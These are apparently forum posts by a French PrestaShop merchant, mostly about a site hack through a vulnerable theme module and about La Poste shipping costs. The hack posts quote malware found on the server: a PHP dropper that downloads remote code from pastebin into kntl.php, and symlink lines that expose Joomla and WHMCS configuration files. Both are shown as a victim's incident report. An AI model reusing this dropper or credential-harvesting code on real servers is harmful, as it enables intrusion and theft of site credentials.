biwi.shop

Non rien recu comme mail de prevention :'( etrangement un 1er fichier de piratage je pense j y connais rien est apparu le 21 janvier sur mon ftp ( j'ai dl un back up piratage phising ) ce php avec ce texte ( j'ai suprimer le lien pastebin vers lequel il renvoi en metttant des X ) : <?php $data = file_get_contents('http://pastebin.com/xxxxxxxx'); $file = fopen('kntl.php', 'w'); fwrite($file, $data); fclose($file); echo "succes pakbos"; ?> le fameux fichier kntl est hyper long et a l'air d essayer chaque cms : un court bout : @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt'); Par chance comme j'ai dit il ont rien effacé chez moi c est juste 3 semaine apres que le hacker a crée son module de phising qui a ete vite reperer :/ reste que l hebergeur a fait la tete, google m a provisoirement declassé ( normal) et jai du faire intervenir quelqu un qui se connait en php et cms ( c est pas gratuit )

Ce que je reproche surtout c est que j ai jamais ete prévenu , la faille est corrigé mais j'ai vu dans l espace client de prestashop addon un truc du genre " ne vous inquietez pas les correction de faille de securité sont gratuite " bah le module a ete corrige mais ls acheteurs ont jamais ete prevenus ... Et grace a cette faille jai trouvé un joli fichier php " normal " dans le dossier img de ce module qui dl des code de pastebin et a tout une liste de code pour teste si c est joomla , presatashop word press etc ... A noter que le fichier louche est apparu le 21 janvier , le pirate a donc attendu quasi 1 mois pour dl son " module " et lancer sa page de phising . La mise a jour du module date de debut fevrier ...J avais peu d addon ( que des officiel en plus ) mais ca m'encourage pas a en mettre plus :/

j ai eu une reponse de l auteur : Nous vous informons que vous venez de recevoir un nouveau message : Bonjour, Oui, vous avez été infecté et nous nous en excusons, vous auriez effectivement due faire la mise à jour dès réception de l'alerte. Si vous avez été infecté, il est fortement recommandé de: Supprimer ces fichiers. Les seules manières sûres de revenir à un site sécurisé est de : restaurer une sauvegarde récente (pré-hack) de tous vos fichiers. repartir d'une base propre pour les fichiers : réinstaller les fichiers de l'archive PrestaShop. En plus de nettoyer vos fichiers (ou en les remplaçant par une sauvegarde récente), ce que vous devez faire en cas d'infection confirmée est : Changez votre mot de passe de back-office, et que d'autres comptes admin. Consultez la page des employés pour vérifier qu'aucun nouvel employé a été créé. Changez votre mot de passe SQL. Changez votre mot de passe FTP. Changez vos identifiants et mots de passe pour vos modules bancaires / de paiement, si vous en utilisez (PayPal, Atos, PayBox, etc.). Remplacez vos modules importants par leur toute dernière version téléchargée depuis Addons ou depuis le site du développeur originel. Changez vos identifiants pour tous vos services tiers. La dernière version qui est la 1.1.6 a été sécurisé avec l'aide de la personne chargée de la sécurité chez prestashop. Cette mise à jour est bien entendu gratuite. Cordialement, j avais oublie de precisé que javais une version 1.6.9 mais javais mis le patch de securité qui etaitsorti il ya quelque mois

Pas encore j'ai contacté le createur du module la par mail car je vois qu il a fait une mise a jour sur la page add on il y a 2 semaine : Nouveautés de la version 1.1.6(06/02/2017) V.1.1.6: Increase security En plus du coup sans ce module bien pratique je me retrouve avec le bootstrap de base ca fait drole mp recu j'ai repondu

Salut a mon tour d avoir ete piraté , dans la nuit de vendredi a samedi une page de phising ( pour un site alemand ) a ete crée sur mon site , l hebergeur a vite ete prvenu et a bloquer mon compe , il a trouver un dossier cuwke dans mes modules qu il a viré et transmis en zip. Apparement c est le module : https://addons.prestashop.com/fr/personnalisation-de-page/17952-configurateur-de-themes-avance-theme-maker.html que j avais acheté il y a un an qui est la cause de ce probleme car en rapatriant mes fichiers du ftp a chez moi et apres un coup d avast il ma trouvé des php backdoor dans ce module : http://image.noelshack.com/fichiers/2017/07/1487519847-sans-titre-3.jpg En tout cas j'ai jamais ete prevenu qu il y avait un soucis de sécurité sur ce module ni meme qu une mise a jour s imposait ...

Faudrai deja que le site de la poste marche , aujourdhui 2 commande de 120 timbre suivie a 1.05 2 fois 120 € de debite et 0 timbre ( allez voir la page facebook de la poste tout le monde s en plaint )

Perso j imprime sur des feuille A4 pour les collisimo, par contre pour les timbre en ligne apres 5 mois de test je preconise l achats d une imprimante dymo ( la label writer 450 marche tres bien ) et du papier " compatible " ( moins blanc mais moins cher ) car les impression jet d encre ou laser reviennent assez cher et je me suis apercu qu en frottant un peu les étiquettes l impression du code barre parfois s en va ( papier avery ) , sur la dymo il n y pas d encre c est le papier qui est chauffé du coup plus d achats de cartouche ou toner . Par contre je le redit il faut acheter du papier dymo compatible l officiel est hors de prix genre 20 euros les 2 rouleaux de 260 etiquette le compatible 12 € les 5 rouleaux de 260 ( cherchez 99012 compatible sur des site comme amazo.. ) .

Perso apres 8 ans sur shopfactory je suis passé sur prestashop et ma fois malgres quelque bug je trouve que c est une bonne solution " gratuite " ca manque juste de clic and play comme shopfactory mais j ai resolu ca en achetant store manager pour prestashop . Le tout herbege sur yoorshop qui est tip top et dont le sav ( Yohan ) m a renseigné sur comment voir ce qui faisait ramer mon site ( mode debug de prestashop comment le mettre en route pour voir quel modul est a virer ) + des infos sur ce forum . Je gere 5000 article sur mon site commercial ( biwi-shop) et ca fonctionne tres bien a 99 % du temps , le seul defaut c est que depuis quelque temps je dois faire un ctrl + f5 pour actualiser la page des commandes qui ne se met pas a jour mais bon pour le prix ca va

Tiens pour en revenir a ce post jai fait un devis affranchigo donc c est simple vous faite vos enveloppe vous collez l etiquette d adresse + le code suivi avec prepasecure et ensuite vient la poste qui va affranchir vos lettre a votre place . Ca pourrai etre beau sauf que ce service coute 0.11 cts HT mais pour des envoi plats , tout ce qui est lettre bulles c est 33 cts HT ( car ca doit etre timbré a la main et pas par la machine de la poste ) donc grosso modo le devis del a poste me faisait 0.40 cts de + par envoi ( car ya un abonnement mensuel aussi ) en plsu du tarif normal du timbre , pour avoir une remise faut faire 900 envois / jours ...

lol oui perso jai trouver un fournisseurs ( je sais pas si je peux le citer donc je le cite pas ) mais les lettre bulle me reviennent a 0.10 cts piece ( 1.50 la poste lol ) et chez un pro de la fourniture j ai trouver des carton haut de 2.5 cm parfait pour envoyer des produits qui ne rentrait pas des lettre max pas assez large et plus economique qu en collisimo . A noter que le timbre en ligne " pro" les tarifs sont plus bas que sur mon image d en haut c est 1.50 le 20 gramme 1.46 le 50 gramme 2.99 le 50 a 250 gramme pour prepasecure jattend un devis de la poste avec frequenceo mais apparement les lettre a bulle sont hors gabarit et il facturerai 0.30 cts par emballage car ils doivent les affranchir a la main + abonnement mensuel + obligation d avoir une tournée postal ( payante ) car on peut pasl es deposer au bureau de poste ... donc au final le plus simple c est d imprimer ses timbres et de les coller soi meme sur des lettre bulles pas chers .

. ca prend pas autant de temps en plus vu l economie realisé que vous achetiez par exemple les etiquette de suivie + timbre vendu par 5 ...que pour le 20 gramme ou que vous imprimez 100 timbre a 1.05 + 100 etiquette de numero de suivie dans les 2 cas ca sera pareil faudra decoller et coller sur une lettre bulle ou carton de - de 3 cm . ( pour la poste c est rentable car le carnet de 5 timbre 20 gramme + suivi = 5.40 alors que 5 timbre en ligne + suivi a 20 gramme = 5 *1.05 = 5.25) Suffit d enfourner les planche d etiquette dans l imprimante et hop . J ai entendu parler de prepasecure mais apparment le cout au poid est + cher et j ai souvenir il y a 7 ans d avoir utiliser un systeme du meme genre ( frequence a et c ) de la poste sauf que le poids facturé ne correspondait pas tjr ( en ma defaveur ) Essayer de contacter la poste pro mais mefiance en general leur offre " pro " sont moins interessante que celle aux " particuliers " . Par contre le timbre en ligne a une aberration c est que on ne peut en imprimer plus de 150 par commande , passant 1000 commande mois je dois le faire en plusieurs fois . j ai fait un dessins ( pour ma commerciale de la poste qui me dit c est moins cher nos prepayé ) ci dessous ; attention ce sont les tarifs particuliers ( en pro le timbre en ligne est moins cher de quelque centimes ) meme si c est moins pratique on economise quand meme pas mal comparé aux lettre max d avant . Comparez le tarif avec celui que la poste vous proposera en prepasecure ( qui demandera quand meme d imprimer et coller une etiquette sur l emballage ) p.s ce sont les tarif particulier pour un pro le 100 gramme est a 1.98 au lieu de 2.12

yep en faisant ça ( associer site web et virer le code p123456 de la case profil du module ) j ai enfin Google API Authorization granted